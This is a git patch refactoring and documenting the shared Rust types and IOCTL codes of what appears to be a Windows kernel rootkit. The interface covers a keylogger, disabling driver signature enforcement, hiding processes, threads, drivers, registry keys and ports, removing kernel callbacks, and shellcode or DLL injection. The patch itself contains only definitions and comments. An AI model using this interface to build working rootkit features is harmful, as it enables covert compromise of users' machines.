From ad49bfe643c83d52920a2b97787e82ab8308266c Mon Sep 17 00:00:00 2001 From: joaoviictorti Date: Thu, 26 Sep 2024 21:10:24 -0300 Subject: [PATCH] refactor(shared): Refactoring and adding documentation for clarity --- shared/.gitignore | 1 - shared/src/enums.rs | 30 +++++++++ shared/src/ioctls.rs | 33 ++++----- shared/src/lib.rs | 3 +- shared/src/structs/callback.rs | 35 +++++++--- shared/src/structs/driver.rs | 46 ++++++++++--- shared/src/structs/injection.rs | 6 -- shared/src/structs/mod.rs | 114 +++++++++++++++++++++++++++----- shared/src/structs/module.rs | 20 +++++- shared/src/structs/process.rs | 57 +++++++++++++--- shared/src/structs/registry.rs | 8 --- shared/src/structs/thread.rs | 39 ++++++++--- shared/src/vars.rs | 24 ++----- 13 files changed, 312 insertions(+), 104 deletions(-) delete mode 100644 shared/.gitignore create mode 100644 shared/src/enums.rs delete mode 100644 shared/src/structs/injection.rs delete mode 100644 shared/src/structs/registry.rs diff --git a/shared/.gitignore b/shared/.gitignore deleted file mode 100644 index c41cc9e..0000000 --- a/shared/.gitignore +++ /dev/null @@ -1 +0,0 @@ -/target \ No newline at end of file diff --git a/shared/src/enums.rs b/shared/src/enums.rs new file mode 100644 index 0000000..647c7b4 --- /dev/null +++ b/shared/src/enums.rs @@ -0,0 +1,30 @@ +#[derive(Debug, Copy, Clone, PartialEq, Default)] +pub enum Callbacks { + #[default] + PsSetCreateProcessNotifyRoutine, + PsSetCreateThreadNotifyRoutine, + PsSetLoadImageNotifyRoutine, + CmRegisterCallbackEx, + ObProcess, + ObThread, +} + +#[derive(Debug)] +pub enum Options { + Hide, + Protection, +} + +/// Represents the type of protocol (TCP/UDP). +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum Protocol { + TCP, + UDP, +} + +/// Represents whether the port is local or remote. +#[derive(Debug, Clone, Copy, PartialEq, Eq)] +pub enum PortType { + LOCAL, + REMOTE, +} \ No newline at end of file diff --git a/shared/src/ioctls.rs b/shared/src/ioctls.rs index 5d88b11..5ccfe29 100644 --- a/shared/src/ioctls.rs +++ b/shared/src/ioctls.rs @@ -32,26 +32,29 @@ pub const IOCTL_ENABLE_DSE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x811, METHOD_N pub const IOCTL_KEYLOGGER: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x812, METHOD_NEITHER, FILE_ANY_ACCESS); // ETWTI -pub const IOCTL_ETWTI: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x827, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_ETWTI: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x813, METHOD_NEITHER, FILE_ANY_ACCESS); + +// PORT +pub const IOCTL_PORT: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x814, METHOD_NEITHER, FILE_ANY_ACCESS); // Callbacks -pub const IOCTL_ENUMERATE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x813, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_REMOVE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x814, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_RESTORE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x815, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_ENUMERATE_REMOVED_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x816, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_ENUMERATE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x815, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_REMOVE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x816, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_RESTORE_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x817, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_ENUMERATE_REMOVED_CALLBACK: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x818, METHOD_NEITHER, FILE_ANY_ACCESS); // Registry -pub const IOCTL_REGISTRY_PROTECTION_VALUE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x817, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_REGISTRY_PROTECTION_KEY: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x818, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_HIDE_UNHIDE_KEY: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x819, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_HIDE_UNHIDE_VALUE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x820, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_REGISTRY_PROTECTION_VALUE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x819, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_REGISTRY_PROTECTION_KEY: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x820, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_HIDE_UNHIDE_KEY: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x821, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_HIDE_UNHIDE_VALUE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x822, METHOD_NEITHER, FILE_ANY_ACCESS); // Module -pub const IOCTL_ENUMERATE_MODULE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x821, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_HIDE_MODULE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x822, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_ENUMERATE_MODULE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x823, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_HIDE_MODULE: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x824, METHOD_NEITHER, FILE_ANY_ACCESS); // Injection -pub const IOCTL_INJECTION_SHELLCODE_THREAD: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x823, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_INJECTION_SHELLCODE_APC: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x824, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_INJECTION_DLL_THREAD: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x825, METHOD_NEITHER, FILE_ANY_ACCESS); -pub const IOCTL_INJECTION_DLL_APC: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x826, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_INJECTION_SHELLCODE_THREAD: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x825, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_INJECTION_SHELLCODE_APC: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x826, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_INJECTION_DLL_THREAD: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x827, METHOD_NEITHER, FILE_ANY_ACCESS); +pub const IOCTL_INJECTION_DLL_APC: u32 = CTL_CODE!(FILE_DEVICE_UNKNOWN, 0x828, METHOD_NEITHER, FILE_ANY_ACCESS); diff --git a/shared/src/lib.rs b/shared/src/lib.rs index c63cef8..ef16689 100644 --- a/shared/src/lib.rs +++ b/shared/src/lib.rs @@ -3,5 +3,6 @@ extern crate alloc; pub mod ioctls; +pub mod structs; pub mod vars; -pub mod structs; \ No newline at end of file +pub mod enums; \ No newline at end of file diff --git a/shared/src/structs/callback.rs b/shared/src/structs/callback.rs index 4518f97..1c60969 100644 --- a/shared/src/structs/callback.rs +++ b/shared/src/structs/callback.rs @@ -1,20 +1,39 @@ -use crate::vars::Callbacks; +use crate::enums::Callbacks; -// Callback Information for Enumeration (Output) +/// Callback Information for Enumeration (Output) +/// +/// This struct represents the information about a callback that is used in an enumeration process. +/// It includes details like the callback's memory address, name, and operations associated with it. #[repr(C)] -#[derive(Debug)] +#[derive(Debug, Copy, Clone)] pub struct CallbackInfoOutput { + /// The memory address where the callback is located. pub address: usize, + + /// The name of the callback, represented as a UTF-16 array of fixed length (256). + /// This is useful for systems (like Windows) that use UTF-16 strings. pub name: [u16; 256], + + /// The index of the callback in the enumeration. pub index: u8, + + /// The memory address of the pre-operation function associated with this callback. pub pre_operation: usize, - pub post_operation: usize + + /// The memory address of the post-operation function associated with this callback. + pub post_operation: usize, } -// Callback Information for Action (Input) +/// Callback Information for Action (Input) +/// +/// This struct is used to represent input data when performing an action on a callback. +/// It includes the callback's index and the specific callback action to be taken. #[repr(C)] -#[derive(Debug)] +#[derive(Debug, Copy, Clone)] pub struct CallbackInfoInput { + /// The index of the callback that will be targeted by the action. pub index: usize, - pub callback: Callbacks -} + + /// The specific callback action, represented by the `Callbacks` enum. + pub callback: Callbacks, +} \ No newline at end of file diff --git a/shared/src/structs/driver.rs b/shared/src/structs/driver.rs index 691abdd..845d644 100644 --- a/shared/src/structs/driver.rs +++ b/shared/src/structs/driver.rs @@ -1,35 +1,65 @@ -use core::sync::atomic::AtomicPtr; use super::LIST_ENTRY; +use core::sync::atomic::AtomicPtr; use ntapi::ntldr::LDR_DATA_TABLE_ENTRY; -// Enumerate Drivers +/// Enumerates driver information for system drivers. +/// +/// This struct holds basic information about a driver, including its address, name, and an index +/// for identification. The `name` field is represented as a UTF-16 array to maintain compatibility +/// with systems that use this encoding (like Windows). #[repr(C)] pub struct DriverInfo { + /// The memory address where the driver is loaded. pub address: usize, + + /// The name of the driver, stored as a UTF-16 encoded string with a fixed length of 256. pub name: [u16; 256], + + /// The index of the driver in the enumeration. pub index: u8, } -// Enable / Disable DSE +/// Represents a structure to enable or disable Driver Signature Enforcement (DSE). +/// +/// This struct is used to toggle the state of DSE, with the `enable` field indicating whether +/// DSE is currently enabled or disabled. #[repr(C)] #[derive(Debug)] pub struct DSE { - pub enable: bool + /// A boolean flag to enable or disable DSE. `true` means DSE is enabled, `false` means it is disabled. + pub enable: bool, } -// Structure that stores the values of the process that has been hidden +/// Stores the values related to a hidden driver. +/// +/// This struct is used to keep track of a driver that has been hidden from the system. It stores +/// the driver's name and relevant pointers to system structures such as the driver's list entry and +/// data table entry. #[repr(C)] #[derive(Debug)] -pub struct HiddenDriverInfo { +pub struct HiddenDriverInfo { + /// The name of the hidden driver as a dynamic string (heap-allocated). pub name: alloc::string::String, + + /// A pointer to the `LIST_ENTRY` structure representing the driver's list in the system. pub list_entry: AtomicPtr, + + /// A pointer to the `LDR_DATA_TABLE_ENTRY` structure that represents the driver's data in the system. pub driver_entry: AtomicPtr, } -// Represents a drivers information, including its name and a flag indicating whether it should be hidden or not + +/// Represents the target driver for operations like hiding or revealing it. +/// +/// This struct holds information about a driver, specifically its name and a flag indicating whether +/// it should be enabled (visible) or hidden. #[repr(C)] #[derive(Debug, Default)] pub struct TargetDriver { + /// The name of the target driver as a dynamic string (heap-allocated). pub name: alloc::string::String, + + /// A boolean flag that indicates whether the driver is enabled (visible) or hidden. + /// `true` means the driver is enabled, `false` means it is hidden. pub enable: bool, -} +} \ No newline at end of file diff --git a/shared/src/structs/injection.rs b/shared/src/structs/injection.rs deleted file mode 100644 index 8f27ccd..0000000 --- a/shared/src/structs/injection.rs +++ /dev/null @@ -1,6 +0,0 @@ - - -pub struct TargetInjection { - pub pid: usize, - pub path: alloc::string::String -} \ No newline at end of file diff --git a/shared/src/structs/mod.rs b/shared/src/structs/mod.rs index 0262ae5..6daa0c7 100644 --- a/shared/src/structs/mod.rs +++ b/shared/src/structs/mod.rs @@ -1,50 +1,130 @@ #![allow(non_camel_case_types)] #![allow(non_snake_case)] -use crate::vars::Options; +use crate::enums::Options; +use crate::enums::{PortType, Protocol}; pub use { - process::*, + callback::*, driver::*, + module::*, + process::*, thread::*, - callback::*, - registry::*, - module::*, - injection::*, }; -pub mod process; -pub mod thread; pub mod callback; pub mod driver; -pub mod registry; pub mod module; -pub mod injection; +pub mod process; +pub mod thread; -// Custom LIST_ENTRY +/// Custom implementation of the `LIST_ENTRY` structure. +/// +/// This struct represents a doubly linked list entry, commonly used in low-level +/// systems programming, especially in Windows kernel structures. It contains +/// forward (`Flink`) and backward (`Blink`) pointers to other entries in the list. #[repr(C)] #[derive(Debug, Clone, Copy)] pub struct LIST_ENTRY { + /// A pointer to the next entry in the list. pub Flink: *mut LIST_ENTRY, + + /// A pointer to the previous entry in the list. pub Blink: *mut LIST_ENTRY, } -// Keylogger +/// Represents the state of the keylogger system. +/// +/// This struct is used to manage whether the keylogger functionality is enabled +/// or disabled. The `enable` field indicates if the keylogger is active. #[repr(C)] #[derive(Debug)] pub struct Keylogger { - pub enable: bool + /// A boolean value indicating if the keylogger is enabled (`true`) or disabled (`false`). + pub enable: bool, } -// ETWTI +/// Represents the state of ETWTI (Event Tracing for Windows Thread Information). +/// +/// This struct manages whether ETWTI is enabled or disabled for capturing thread +/// information. The `enable` field controls the activation of this feature. #[repr(C)] #[derive(Debug)] pub struct ETWTI { - pub enable: bool + /// A boolean value indicating if ETWTI is enabled (`true`) or disabled (`false`). + pub enable: bool, } -// Input for information that needs to be listed +/// Input structure for enumeration of information. +/// +/// This struct is used as input for listing various entities, based on the +/// options provided. The `options` field defines the parameters for the enumeration. #[repr(C)] +#[derive(Debug)] pub struct EnumerateInfoInput { - pub options: Options + /// The options to control how the enumeration should behave, typically set by the user. + pub options: Options, } + +/// Represents the target process and path for a DLL or code injection. +/// +/// This struct contains the necessary information to perform a code or DLL injection +/// into a target process. It includes the process identifier (PID) and the path +/// to the file or resource being injected. +#[repr(C)] +#[derive(Debug)] +pub struct TargetInjection { + /// The process identifier (PID) of the target process where the injection will occur. + pub pid: usize, + + /// The path to the file or resource (typically a DLL) to be injected into the process. + /// This is a dynamic string (heap-allocated) that stores the full path. + pub path: alloc::string::String, +} + +/// Represents information about a network or communication port. +/// +/// This struct holds information about a specific port, including the protocol used, +/// the type of port, its number, and whether the port is enabled or disabled. +/// It is marked as `#[repr(C)]` for compatibility with C-style layouts, making it suitable for +/// FFI (Foreign Function Interface) and low-level systems programming. +#[repr(C)] +#[derive(Debug, Clone, Copy, PartialEq)] +pub struct PortInfo { + /// The protocol used by the port (e.g., TCP, UDP). + /// This field is represented by the `Protocol` enum. + pub protocol: Protocol, + + /// The type of port (e.g., open, filtered). + /// This field is represented by the `PortType` enum. + pub port_type: PortType, + + /// The port number, represented as a 16-bit unsigned integer. + /// Commonly used to identify network services (e.g., port 80 for HTTP). + pub port_number: u16, + + /// A boolean value indicating whether the port is enabled (`true`) or disabled (`false`). + pub enable: bool, +} + +/// Represents the target registry key and value for operations. +/// +/// This struct holds information about a specific registry key and its associated value +/// for operations such as modifying or querying the registry. It includes the registry key, +/// the value associated with that key, and a flag indicating whether the operation should be +/// enabled or not. +#[repr(C)] +#[derive(Debug, Default)] +pub struct TargetRegistry { + /// The registry key, represented as a dynamically allocated string. + /// This is typically the path to a specific registry key (e.g., `HKEY_LOCAL_MACHINE\Software\...`). + pub key: alloc::string::String, + + /// The value associated with the registry key, represented as a dynamically allocated string. + /// This could be a string value stored under the specified registry key. + pub value: alloc::string::String, + + /// A boolean value indicating whether the operation on the registry key should be enabled (`true`) + /// or disabled (`false`). + pub enable: bool, +} \ No newline at end of file diff --git a/shared/src/structs/module.rs b/shared/src/structs/module.rs index 81462e1..d49bd27 100644 --- a/shared/src/structs/module.rs +++ b/shared/src/structs/module.rs @@ -1,16 +1,32 @@ -// Enumerate Modules +/// Represents information about a module in the system. +/// +/// This struct is used for enumerating modules loaded in the system. It includes +/// the module's memory address, its name, and an index that can be used for +/// identification or sorting purposes. #[repr(C)] #[derive(Debug)] pub struct ModuleInfo { + /// The memory address where the module is loaded. pub address: usize, + + /// The name of the module, stored as a UTF-16 encoded string with a fixed length of 256. + /// This allows compatibility with systems like Windows that use UTF-16 encoding. pub name: [u16; 256], + + /// The index of the module in the enumeration, useful for tracking or identifying the module. pub index: u8, } -// Enumerate Modules +/// Represents the target module within a specific process for operations like enumeration or manipulation. +/// +/// This struct contains information about the target process and the specific module within that process. +/// It includes the process identifier (PID) and the name of the module being targeted. #[repr(C)] #[derive(Debug)] pub struct TargetModule { + /// The process identifier (PID) of the process in which the target module is loaded. pub pid: usize, + + /// The name of the target module, stored as a dynamically allocated string. pub module_name: alloc::string::String, } diff --git a/shared/src/structs/process.rs b/shared/src/structs/process.rs index 611ed17..127904e 100644 --- a/shared/src/structs/process.rs +++ b/shared/src/structs/process.rs @@ -1,49 +1,84 @@ -use core::sync::atomic::AtomicPtr; use super::LIST_ENTRY; +use core::sync::atomic::AtomicPtr; -// Stores the information of the process that has been hidden +/// Stores information about a process that has been hidden from the system. +/// +/// This struct holds the process identifier (PID) and a pointer to the process's +/// `LIST_ENTRY`, which is part of the system's internal list management structure. +/// The `AtomicPtr` ensures safe concurrent access to the `LIST_ENTRY`. #[repr(C)] #[derive(Debug)] -pub struct HiddenProcessInfo { +pub struct HiddenProcessInfo { + /// The process identifier (PID) of the hidden process. pub pid: usize, - pub list_entry: AtomicPtr + + /// A pointer to the `LIST_ENTRY` structure, which is used to represent the process + /// in the system's linked list of processes. This is wrapped in an `AtomicPtr` for safe concurrent access. + pub list_entry: AtomicPtr, } -// Stores process information +/// Represents basic information about a process. +/// +/// This struct is used to store the PID of a process. #[repr(C)] #[derive(Debug)] pub struct ProcessListInfo { + /// The process identifier (PID) of the process. pub pids: usize, } -// Stores information about the target process +/// Stores information about a target process for operations such as termination or manipulation. +/// +/// This struct contains the process identifier (PID) of the target process. It is commonly used +/// when the PID is the only information required for an operation on a process. #[repr(C)] #[derive(Debug, Default)] pub struct TargetProcess { + /// The process identifier (PID) of the target process. pub pid: usize, } -// Process Info Hide +/// Represents the state of a process with respect to hiding or visibility. +/// +/// This struct stores the PID of a process and a boolean flag that indicates whether the process +/// is hidden (`true`) or visible (`false`). #[repr(C)] #[derive(Debug, Default)] pub struct ProcessInfoHide { + /// The process identifier (PID) of the process. pub pid: usize, + + /// A boolean value indicating whether the process is hidden (`true`) or visible (`false`). pub enable: bool, } -// Signature information for the target process +/// Stores signature information for a target process. +/// +/// This struct holds information about the signature of a process, such as its PID, signer (sg), +/// and type (tp), which might represent the level or type of protection applied to the process. #[repr(C)] #[derive(Debug)] pub struct ProcessSignature { + /// The process identifier (PID) of the target process. pub pid: usize, + + /// The signer of the process, typically indicating the authority or certificate that signed it. pub sg: usize, + + /// The type of protection applied to the process, represented as an integer. pub tp: usize, } -// Stores the process to be protected +/// Stores information about whether a process is protected. +/// +/// This struct holds the process identifier (PID) and a flag indicating whether the process is +/// protected. It is used to manage processes that have protection mechanisms enabled or disabled. #[repr(C)] #[derive(Debug)] pub struct ProcessProtection { + /// The process identifier (PID) of the process to be protected. pub pid: usize, - pub enable: bool -} \ No newline at end of file + + /// A boolean flag indicating whether the process is protected (`true`) or unprotected (`false`). + pub enable: bool, +} diff --git a/shared/src/structs/registry.rs b/shared/src/structs/registry.rs deleted file mode 100644 index fd141b5..0000000 --- a/shared/src/structs/registry.rs +++ /dev/null @@ -1,8 +0,0 @@ -// Stores the target registry -#[repr(C)] -#[derive(Debug, Default)] -pub struct TargetRegistry { - pub key: alloc::string::String, - pub value: alloc::string::String, - pub enable: bool -} \ No newline at end of file diff --git a/shared/src/structs/thread.rs b/shared/src/structs/thread.rs index 5227442..3604bb1 100644 --- a/shared/src/structs/thread.rs +++ b/shared/src/structs/thread.rs @@ -1,33 +1,56 @@ -use core::sync::atomic::AtomicPtr; use super::LIST_ENTRY; +use core::sync::atomic::AtomicPtr; -// Structure that stores the values of the process that has been hidden +/// Stores information about a thread that has been hidden from the system. +/// +/// This struct holds the thread identifier (TID) and a pointer to the thread's +/// `LIST_ENTRY`, which is part of the system's internal list management structure. +/// The `AtomicPtr` ensures safe concurrent access to the `LIST_ENTRY`. #[repr(C)] #[derive(Debug)] -pub struct HiddenThreadInfo { +pub struct HiddenThreadInfo { + /// The thread identifier (TID) of the hidden thread. pub tid: usize, - pub list_entry: AtomicPtr + + /// A pointer to the `LIST_ENTRY` structure, which represents the thread in the system's + /// linked list of threads. This is wrapped in an `AtomicPtr` for safe concurrent access. + pub list_entry: AtomicPtr, } -// Stores the target thread +/// Represents the target thread for operations like manipulation or monitoring. +/// +/// This struct contains the thread identifier (TID) and a boolean flag indicating whether +/// the thread is enabled or disabled (hidden or active). #[repr(C)] #[derive(Debug, Default)] pub struct TargetThread { + /// The thread identifier (TID) of the target thread. pub tid: usize, + + /// A boolean value indicating whether the thread is enabled (`true`) or disabled/hidden (`false`). pub enable: bool, } -// Stores thread information +/// Stores basic information about a thread. +/// +/// This struct is used to store the TID of a thread, typically for enumeration or tracking. #[repr(C)] #[derive(Debug)] pub struct ThreadListInfo { + /// The thread identifier (TID) of the thread. pub tids: usize, } -// Stores the thread to be protected +/// Stores information about whether a thread is protected. +/// +/// This struct holds the thread identifier (TID) and a flag indicating whether the thread +/// is protected or not. It can be used to manage or toggle protection mechanisms for a thread. #[repr(C)] #[derive(Debug)] pub struct ThreadProtection { + /// The thread identifier (TID) of the thread to be protected. pub tid: usize, - pub enable: bool + + /// A boolean flag indicating whether the thread is protected (`true`) or unprotected (`false`). + pub enable: bool, } diff --git a/shared/src/vars.rs b/shared/src/vars.rs index e89ec97..c8d75ac 100644 --- a/shared/src/vars.rs +++ b/shared/src/vars.rs @@ -1,20 +1,6 @@ -pub const MAX_PIDS: usize = 256; +pub const MAX_PID: usize = 256; pub const MAX_DRIVER: usize = 256; -pub const MAX_TIDS: usize = 256; - -#[derive(Debug, Copy, Clone, PartialEq, Default)] -pub enum Callbacks { - #[default] - PsSetCreateProcessNotifyRoutine, - PsSetCreateThreadNotifyRoutine, - PsSetLoadImageNotifyRoutine, - CmRegisterCallbackEx, - ObProcess, - ObThread, -} - -#[derive(Debug)] -pub enum Options { - Hide, - Protection -} +pub const MAX_TID: usize = 256; +pub const MAX_PORT: usize = 100; +pub const MAX_REGISTRY: usize = 100; +pub const MAX_CALLBACK: usize = 100;